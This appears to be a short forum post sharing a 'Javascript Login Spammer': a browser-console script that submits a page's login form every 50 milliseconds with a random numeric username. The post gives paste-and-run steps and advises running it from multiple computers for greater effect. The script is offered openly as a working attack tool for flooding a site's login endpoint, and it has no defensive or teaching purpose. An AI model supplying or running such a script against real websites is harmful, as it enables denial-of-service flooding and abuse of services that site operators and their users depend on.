Javascript Login Spammer

Code:

========================================================================

function getRandomInt(min, max) {
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min)) + min;
}

function poopLoop3() {
setTimeout(function() {
document.getElementsByName("username")[0].value = getRandomInt(10000, 100000000);
document.forms[0].submit();
poopLoop3()
}, 50)
}

poopLoop3()

//Made by Krosh123

========================================================================

 

  1. Open browser console
  2. Paste the code in
  3. Press enter

Protip: This is most effective when attacked on multiple computers.

Back